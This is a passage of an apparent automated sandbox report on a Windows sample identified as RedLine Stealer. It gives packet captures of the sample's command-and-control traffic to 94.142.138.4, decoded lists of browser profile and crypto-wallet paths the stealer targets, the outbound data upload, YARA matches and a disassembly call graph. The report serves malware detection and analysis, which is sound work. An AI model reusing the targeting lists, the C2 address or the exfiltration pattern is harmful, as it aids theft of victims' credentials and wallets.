                                                                                                                                                                                            May 28, 2023 13:36:21.801467896 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801502943 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801533937 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801568031 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.801573992 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801599026 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.801608086 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801650047 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.801670074 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.801695108 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801748991 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.801779985 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801812887 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801877975 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.801898956 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801935911 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.801970005 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.802000046 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.802027941 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.802704096 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.802736998 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.802934885 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.803282976 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.803508043 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.803543091 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.803579092 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.803601980 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:21.805586100 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.812603951 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838284969 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838346004 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838377953 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838411093 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838443041 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838474989 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838507891 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838740110 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838900089 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.838987112 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839149952 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839210987 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839417934 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839448929 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839483023 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839600086 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839632988 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839726925 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839761972 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839792967 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839905024 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839939117 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.839972019 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840003014 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840082884 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840166092 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840246916 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840306997 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840368032 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840478897 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840511084 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840544939 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840581894 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840614080 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.840970039 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.841128111 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.841198921 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.916366100 CEST804969894.142.138.4192.168.2.3
                                                                                                                                                                                            May 28, 2023 13:36:21.958484888 CEST4969880192.168.2.394.142.138.4
                                                                                                                                                                                            May 28, 2023 13:36:22.961987972 CEST4969880192.168.2.394.142.138.4

                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            May 28, 2023 13:36:16.433954000 CEST5692453192.168.2.38.8.8.8
                                                                                                                                                                                            May 28, 2023 13:36:16.476177931 CEST6062553192.168.2.38.8.8.8

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                            May 28, 2023 13:36:16.433954000 CEST192.168.2.38.8.8.80x3b27Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                                                                                                                            May 28, 2023 13:36:16.476177931 CEST192.168.2.38.8.8.80x28e5Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                            May 28, 2023 13:36:16.468082905 CEST8.8.8.8192.168.2.30x3b27No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            May 28, 2023 13:36:16.511054039 CEST8.8.8.8192.168.2.30x28e5No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            0192.168.2.34969894.142.138.480C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            May 28, 2023 13:36:07.137491941 CEST91OUTData Raw: 00 01 00 01 02 02 1a 6e 65 74 2e 74 63 70 3a 2f 2f 39 34 2e 31 34 32 2e 31 33 38 2e 34 3a 38 30 2f 03 08 0c
                                                                                                                                                                                            Data Ascii: net.tcp://94.142.138.4:80/
                                                                                                                                                                                            May 28, 2023 13:36:07.215883970 CEST91INData Raw: 0b
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            May 28, 2023 13:36:08.237550020 CEST91OUTData Raw: 06 c6 01 51 1d 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 31 1a 6e 65 74 2e 74 63 70 3a 2f 2f 39 34 2e 31 34 32 2e 31 33 38 2e 34 3a 38 30 2f 03 49 64 31 13 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f
                                                                                                                                                                                            Data Ascii: Qhttp://tempuri.org/Entity/Id1net.tcp://94.142.138.4:80/Id1http://tempuri.org/VsaVD@Authorizationns1 684687f1439152a73e2a8b293ee8c64eD?0%H-iD,D*DVB
                                                                                                                                                                                            May 28, 2023 13:36:08.316633940 CEST91INData Raw: 06 8b 01 50 25 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 31 52 65 73 70 6f 6e 73 65 0b 49 64 31 52 65 73 70 6f 6e 73 65 13 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 09 49 64 31 52 65 73 75
                                                                                                                                                                                            Data Ascii: P%http://tempuri.org/Entity/Id1ResponseId1Responsehttp://tempuri.org/Id1ResultVsaVDD?0%H-iDVBB
                                                                                                                                                                                            May 28, 2023 13:36:15.171936035 CEST92OUTData Raw: 06 97 01 22 1d 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 32 03 49 64 32 56 02 0b 01 73 04 0b 01 61 06 56 08 44 0a 1e 00 82 ab 09 40 0d 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 08 03 6e 73 31 99 20 36 38 34
                                                                                                                                                                                            Data Ascii: "http://tempuri.org/Entity/Id2Id2VsaVD@Authorizationns1 684687f1439152a73e2a8b293ee8c64eD&n=$M~D,D*DVB
                                                                                                                                                                                            May 28, 2023 13:36:15.252471924 CEST93INData Raw: 06 94 24 f8 01 25 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 32 52 65 73 70 6f 6e 73 65 0b 49 64 32 52 65 73 70 6f 6e 73 65 09 49 64 32 52 65 73 75 6c 74 06 45 6e 74 69 74 79 29 68 74 74 70 3a 2f 2f 77 77
                                                                                                                                                                                            Data Ascii: $%http://tempuri.org/Entity/Id2ResponseId2ResponseId2ResultEntity)http://www.w3.org/2001/XMLSchema-instanceId1Id109http://schemas.microsoft.com/2003/10/Serialization/ArraysstringId11Id12Id13Entity17Id2Id3Entity16Id4Id5Id6I
                                                                                                                                                                                            May 28, 2023 13:36:15.252507925 CEST94INData Raw: 65 72 20 44 61 74 61 46 19 99 31 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 46 19 99 31 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44
                                                                                                                                                                                            Data Ascii: er DataF1%USERPROFILE%\AppData\Local\7Star\7Star\User DataF1%USERPROFILE%\AppData\Local\CentBrowser\User DataF,%USERPROFILE%\AppData\Local\Chedot\User DataF-%USERPROFILE%\AppData\Local\Vivaldi\User DataF,%USERPROFILE%\AppData\Local\K
                                                                                                                                                                                            May 28, 2023 13:36:15.252528906 CEST96INData Raw: 5c 4c 6f 63 61 6c 5c 4e 69 63 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 46 19 99 34 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 6f 63 43 6f 63 5c 42 72 6f 77 73 65 72 5c 55 73 65 72 20 44 61 74 61 46
                                                                                                                                                                                            Data Ascii: \Local\Nichrome\User DataF4%USERPROFILE%\AppData\Local\CocCoc\Browser\User DataF*%USERPROFILE%\AppData\Local\Uran\User DataF.%USERPROFILE%\AppData\Local\Chromodo\User DataF2%USERPROFILE%\AppData\Local\Mail.Ru\Atom\User DataFA%USERPRO
                                                                                                                                                                                            May 28, 2023 13:36:15.252549887 CEST96INData Raw: 25 45 25 45 27 45 13 99 10 45 6c 65 63 74 72 75 6d 5c 77 61 6c 6c 65 74 73 45 23 99 01 2a 45 25 85 01 01 01 45 21 45 13 99 08 45 74 68 65 72 65 75 6d 45 23 99 09 25 61 70 70 64 61 74 61 25 45 25 45 27 45 13 99 10 45 74 68 65 72 65 75 6d 5c 77 61
                                                                                                                                                                                            Data Ascii: %E%E'EElectrum\walletsE#*E%E!EEthereumE#%appdata%E%E'EEthereum\walletsE#*E%E!EExodusE#%appdata%E%E'EExodus\exodus.walletE#*E%E'EExodusE#*.jsonE%E!EGuardaE#%appdata%E%E'EGuardaE#*E%E!E
                                                                                                                                                                                            May 28, 2023 13:36:21.073013067 CEST115OUTData Raw: 06 83 ba 34 81 02 1d 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 33 03 49 64 33 04 75 73 65 72 06 45 6e 74 69 74 79 29 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68
                                                                                                                                                                                            Data Ascii: 4http://tempuri.org/Entity/Id3Id3userEntity)http://www.w3.org/2001/XMLSchema-instanceId10Id11Id12Id13nilId14Id15Id4Id5Id6Id79http://schemas.microsoft.com/2003/10/Serialization/ArraysstringId16Entity5Entity3Entity9Enti
                                                                                                                                                                                            May 28, 2023 13:36:21.111293077 CEST121OUTData Raw: 00 c8 8f b3 aa db 7f 57 7c a2 f9 fb 9a af 38 01 90 6e 01 de 74 e6 ab fc 63 c0 f4 6b c0 23 01 f0 0d 23 01 90 1e 03 66 01 b0 fd 21 10 69 d0 30 d2 b0 41 fe 08 28 fa a5 60 e3 23 27 00 12 ce b0 10 6d c8 d0 86 cb b4 1b 68 23 00 da b6 49 dc fe 33 57 1c
                                                                                                                                                                                            Data Ascii: W|8ntck##f!i0A(`#'mh#I3Wk^'qUfk^anH#O<a?-?damo.nGw~(-{F:/@4b_#cxpv?k5:`
                                                                                                                                                                                            May 28, 2023 13:36:21.111293077 CEST123OUTData Raw: f8 f6 1f bd af b9 e5 77 66 bf fd f6 33 87 1e 7a a8 39 f9 e4 93 cd a7 3f fd 69 73 f0 c1 07 9b 6f 7d eb 5b 49 01 f0 bc df fe d6 5c 79 d5 d5 e6 c6 9b 6e 4e 0b 80 76 83 97 1b cc 38 78 51 84 16 f5 40 f8 6b 3f 77 09 80 bc 50 b4 68 21 2f 05 3d f2 4b 22
                                                                                                                                                                                            Data Ascii: wf3z9?iso}[I\ynNv8xQ@k?wPh!/=K" A"^kG1v= nx %%/%0&!AWB<4|kn=>IWX]d(m>>LKl[J@a6J#JcCCF@mcAqH-t)
                                                                                                                                                                                            May 28, 2023 13:36:21.111293077 CEST128OUTData Raw: b9 0d e7 c4 3f bb c1 00 11 50 22 27 f5 03 1f fe 5c b3 c9 a3 9f 6b 8e fe d2 4f cd db 8e f9 81 f9 fb 03 4e 35 7f f6 0f 9f 82 a2 9f 84 5e 48 d4 ab 41 be 96 8b 00 78 d4 47 48 00 5c 1b 08 7d 43 8b 7d 08 12 00 0f 00 02 e0 e2 16 4f 74 f0 67 76 93 9f fb
                                                                                                                                                                                            Data Ascii: ?P"'\kON5^HAxGH\}C}OtgvI#8m9$nC4hzVMQ>]_[>8m 'OX[/-r6tW3I6\$M;=%&M0[uAq
                                                                                                                                                                                            May 28, 2023 13:36:21.111392021 CEST131OUTData Raw: c2 66 2d 5b 3c c1 2e 2c 76 62 53 38 10 d6 87 6b c3 ba 30 94 6e 26 6d 07 b9 73 9a 1c 8e dd 28 ae 2a a3 2b 87 c8 0b a6 25 e3 e9 8d 85 dd 53 a0 f2 d2 df 5b 58 37 5a 58 69 13 71 0b 9f 6d e4 4d 1f 67 56 6c fc 68 b3 62 93 3f 6e d8 ec f1 d6 9d e2 b6 b0
                                                                                                                                                                                            Data Ascii: f-[<.,vbS8k0n&ms(*+%S[X7ZXiqmMgVlhb?n?AK?d\4xuX-YeKfuqEvvj<6-$,4m]6AT/:.-o6vp6-@&wmf6XlKn,HEe{#
                                                                                                                                                                                            May 28, 2023 13:36:21.111392021 CEST133OUTData Raw: 34 6c 62 50 1c 26 0a df f6 47 5f 38 9d 41 05 40 4e 9f be 67 10 f9 33 6e ad b2 69 75 08 80 0e 5a cb 39 1e a7 2d e1 3c 09 99 47 06 99 a6 1e ef 1e b4 86 16 e0 0f 08 09 50 1c 04 0c 2b d7 79 59 d6 02 b8 5f 99 28 ed 81 81 f5 1d a3 fc d3 46 b7 d7 10 a0
                                                                                                                                                                                            Data Ascii: 4lbP&G_8A@Ng3niuZ9-<GP+yY_(F|>GKyfR rrP)9"6>jED04RX?-iQl.nbHl-}s051P$jLh
                                                                                                                                                                                            May 28, 2023 13:36:21.111392021 CEST138OUTData Raw: f5 04 60 fc 04 a0 31 37 55 80 e8 57 03 5a 33 24 a5 e1 a6 85 5a bf 68 0d 47 c2 1f d3 bd 0f b6 eb 58 6f 64 5a 03 21 ed 4b 8d fe ee 66 20 fa 49 b4 bd ab 41 36 72 1d c8 26 1f 1e 29 fe 65 c5 be b9 00 b8 cc 10 62 dc d4 b1 f9 a3 31 b1 9c 88 da b3 12 64
                                                                                                                                                                                            Data Ascii: `17UWZ3$ZhGXodZ!Kf IA6r&)eb1dGxGmC',-?/?d"@>;.-[H/iq>Y\bqn;%$/n]{6tc{p7&wj~6<IE8&{'S@Rz+0t
                                                                                                                                                                                            May 28, 2023 13:36:21.916366100 CEST992INData Raw: 06 6a 32 25 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 33 52 65 73 70 6f 6e 73 65 0b 49 64 33 52 65 73 70 6f 6e 73 65 56 02 0b 01 73 04 0b 01 61 06 56 08 44 0a 1e 00 82 ab 35 44 12 ad 2c 63 f2 64 13 4a 66
                                                                                                                                                                                            Data Ascii: j2%http://tempuri.org/Entity/Id3ResponseId3ResponseVsaVD5D,cdJfKKGDVB7


                                                                                                                                                                                            Statistics

                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:13:35:56
                                                                                                                                                                                            Start date:28/05/2023
                                                                                                                                                                                            Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:359160 bytes
                                                                                                                                                                                            MD5 hash:3694C18F01430F213ACED163C75788A0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.351025860.0000000000562000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                            Start time:13:35:56
                                                                                                                                                                                            Start date:28/05/2023
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff745070000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                            Start time:13:35:56
                                                                                                                                                                                            Start date:28/05/2023
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe
                                                                                                                                                                                            Imagebase:0x130000
                                                                                                                                                                                            File size:98912 bytes
                                                                                                                                                                                            MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.406792188.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.408509605.000000000759D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Reset < >

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:11.7%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:1.3%
                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                              Total number of Limit Nodes:42
                                                                                                                                                                                              execution_graph 18329 405655 18332 40c5c2 LeaveCriticalSection 18329->18332 18331 40565c 18332->18331 15398 402e56 15399 402e64 15398->15399 15400 402e71 15399->15400 15403 402f97 15399->15403 15404 402fa3 __EH_prolog3_GS 15403->15404 15405 402fe8 15404->15405 15406 402ffe 15404->15406 15410 402fbe 15404->15410 15429 402d5b 15405->15429 15435 401000 15406->15435 15432 407177 15410->15432 15411 403006 15416 402f73 7 API calls ctype 15411->15416 15419 40297b 7 API calls ctype 15411->15419 15420 40309e 15411->15420 15422 40307f 15411->15422 15439 402000 15411->15439 15467 401720 15411->15467 15473 407186 15411->15473 15416->15411 15417 402f73 ctype 7 API calls 15417->15420 15418 40297b ctype 7 API calls 15418->15420 15419->15411 15420->15417 15420->15418 15492 4011c0 15420->15492 15498 407487 15420->15498 15445 402f73 15422->15445 15430 407186 _fgetc 78 API calls 15429->15430 15431 402d68 15430->15431 15431->15410 15511 4070b5 15432->15511 15434 407181 15434->15434 15436 401011 std::locale::_Locimp::_Locimp 15435->15436 15437 4011c0 std::locale::_Locimp::~_Locimp 66 API calls 15436->15437 15438 401025 15437->15438 15438->15411 15440 40201a 15439->15440 15441 40201f 15439->15441 15520 403a9a 15440->15520 15443 40203f std::locale::_Locimp::~_Locimp ctype 15441->15443 15528 401810 15441->15528 15443->15411 15446 402f7e 15445->15446 15786 402d14 15446->15786 15449 40297b 15450 402987 15449->15450 15451 4029af 15449->15451 15452 405223 ctype 7 API calls 15450->15452 15453 402990 15450->15453 15455 405582 15451->15455 15452->15453 15453->15451 15454 405223 ctype 7 API calls 15453->15454 15454->15451 15456 405592 15455->15456 15457 405596 15455->15457 15456->15420 15458 40559b 15457->15458 15460 4055d1 _memset 15457->15460 15461 4055c0 15457->15461 15459 40a982 __fclose_nolock 64 API calls 15458->15459 15462 4055a0 15459->15462 15460->15458 15464 4055e5 15460->15464 15796 404970 15461->15796 15465 4051fd __fclose_nolock 7 API calls 15462->15465 15464->15456 15466 40a982 __fclose_nolock 64 API calls 15464->15466 15465->15456 15466->15462 15468 401734 15467->15468 15469 401739 std::_Locinfo::_Locinfo_ctor 15467->15469 15470 403ad2 std::_Locinfo::_Locinfo_ctor 77 API calls 15468->15470 15472 401790 std::locale::_Locimp::~_Locimp 15469->15472 15800 402120 15469->15800 15470->15469 15472->15411 15474 407192 _fgetc 15473->15474 15475 4071c5 15474->15475 15476 4071a5 15474->15476 15819 407e8b 15475->15819 15477 40a982 __fclose_nolock 64 API calls 15476->15477 15479 4071aa 15477->15479 15481 4051fd __fclose_nolock 7 API calls 15479->15481 15482 4071ba _fgetc 15481->15482 15482->15411 15484 407245 15487 407256 15484->15487 15825 40e9f7 15484->15825 15851 407282 15487->15851 15488 40a982 __fclose_nolock 64 API calls 15490 407235 15488->15490 15491 4051fd __fclose_nolock 7 API calls 15490->15491 15491->15484 15493 4011d1 std::locale::_Locimp::~_Locimp 15492->15493 15494 4011d3 15492->15494 15493->15420 15494->15493 15495 401201 15494->15495 15497 4020f0 std::locale::_Locimp::~_Locimp 65 API calls 15494->15497 16187 401a50 15495->16187 15497->15495 15499 407493 _fgetc 15498->15499 15500 4074a1 15499->15500 15501 4074be 15499->15501 15502 40a982 __fclose_nolock 64 API calls 15500->15502 15503 407e8b __lock_file 65 API calls 15501->15503 15504 4074a6 15502->15504 15505 4074c6 15503->15505 15506 4051fd __fclose_nolock 7 API calls 15504->15506 16196 407396 15505->16196 15509 4074b6 _fgetc 15506->15509 15509->15420 15512 4070bd 15511->15512 15513 4070bf IsDebuggerPresent 15511->15513 15512->15434 15519 40c22c 15513->15519 15516 40e9be SetUnhandledExceptionFilter UnhandledExceptionFilter 15517 40e9e3 GetCurrentProcess TerminateProcess 15516->15517 15518 40e9db __invoke_watson 15516->15518 15517->15434 15518->15517 15519->15516 15521 403aa6 __EH_prolog3 15520->15521 15537 401030 15521->15537 15527 403ad1 15529 401821 std::_Locinfo::_Locinfo_ctor 15528->15529 15530 40182b 15529->15530 15531 403a9a std::_String_base::_Xlen 77 API calls 15529->15531 15532 401836 15530->15532 15533 40184b 15530->15533 15531->15530 15619 401ab0 15532->15619 15535 401849 std::locale::_Locimp::~_Locimp 15533->15535 15536 4011c0 std::locale::_Locimp::~_Locimp 66 API calls 15533->15536 15535->15443 15536->15535 15538 401041 std::locale::_Locimp::_Locimp 15537->15538 15539 4011c0 std::locale::_Locimp::~_Locimp 66 API calls 15538->15539 15540 401055 15539->15540 15549 401170 15540->15549 15543 401cc0 15544 401cf0 std::bad_exception::bad_exception 77 API calls 15543->15544 15545 401cd3 15544->15545 15546 4052cb 15545->15546 15547 405300 RaiseException 15546->15547 15548 4052f4 15546->15548 15547->15527 15548->15547 15550 401180 std::_Locinfo::_Locinfo_ctor 15549->15550 15553 401690 15550->15553 15552 401061 15552->15543 15554 4016a3 std::_Locinfo::_Locinfo_ctor 15553->15554 15555 4016ca 15554->15555 15556 4016aa std::_Locinfo::_Locinfo_ctor 15554->15556 15557 401810 std::_Locinfo::_Locinfo_ctor 77 API calls 15555->15557 15562 401390 15556->15562 15560 4016d8 std::_Locinfo::_Locinfo_ctor 15557->15560 15559 4016c8 std::locale::_Locimp::~_Locimp 15559->15552 15560->15559 15575 4020f0 15560->15575 15563 4013a1 std::_Locinfo::_Locinfo_ctor 15562->15563 15565 4013ab std::_Locinfo::_Locinfo_ctor 15563->15565 15579 403ad2 15563->15579 15566 4013f4 15565->15566 15567 4013cf 15565->15567 15568 401810 std::_Locinfo::_Locinfo_ctor 77 API calls 15566->15568 15569 401720 std::_Locinfo::_Locinfo_ctor 77 API calls 15567->15569 15573 401402 std::_Locinfo::_Locinfo_ctor 15568->15573 15570 4013e4 15569->15570 15572 401720 std::_Locinfo::_Locinfo_ctor 77 API calls 15570->15572 15571 4013f2 std::locale::_Locimp::~_Locimp 15571->15559 15572->15571 15573->15571 15574 4020f0 std::locale::_Locimp::~_Locimp 65 API calls 15573->15574 15574->15571 15576 4020f9 std::locale::_Locimp::~_Locimp 15575->15576 15613 402710 15576->15613 